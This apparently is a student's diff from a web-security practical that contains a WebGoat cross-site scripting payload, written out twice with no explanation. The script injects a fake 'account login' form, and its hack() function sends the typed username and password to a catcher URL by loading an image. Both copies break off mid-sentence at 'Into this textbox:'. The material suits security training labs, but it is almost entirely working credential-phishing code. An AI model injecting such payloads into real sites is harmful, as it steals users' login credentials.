Chaygois · August 17, 2023 19:31
diff --git a/ST2515Practical3XSS b/ST2515Practical3XSS
 <script>
 function hack(){
    alert("Login="+document.forms[0].user.value
      + "Password="+document.forms[0].pass.value);
    XSSImage=new Image;
    XSSImage.src="http://127.0.0.1:8080/WebGoat/catcher"
      +"?PROPERTY=yes"
      +"&user="+document.forms[0].user.value
      +"&pass="+document.forms[0].pass.value;
  }
 </script>

 <form>
  <br><br><HR>
  <H3>This feature requires account login:</H3>
  <br><br>
  Enter Username:<br><input type="text" id="user" name="user"><br>
  Enter Password:<br><input type="password"  id ="pass" name="pass"><br>
  <input type="submit" name="login" value="login" onclick="hack()">
 </form>

 <br><br><HR>
 Into this textbox:
	<script>
	function hack(){
	alert("Login="+document.forms[0].user.value
	+ "Password="+document.forms[0].pass.value);
	XSSImage=new Image;
	XSSImage.src="http://127.0.0.1:8080/WebGoat/catcher"
	+"?PROPERTY=yes"
	+"&user="+document.forms[0].user.value
	+"&pass="+document.forms[0].pass.value;
	}
	</script>

	<form>
	<br><br><HR>
	<H3>This feature requires account login:</H3>
	<br><br>
	Enter Username:<br><input type="text" id="user" name="user"><br>
	Enter Password:<br><input type="password" id ="pass" name="pass"><br>
	<input type="submit" name="login" value="login" onclick="hack()">
	</form>

	<br><br><HR>
	Into this textbox: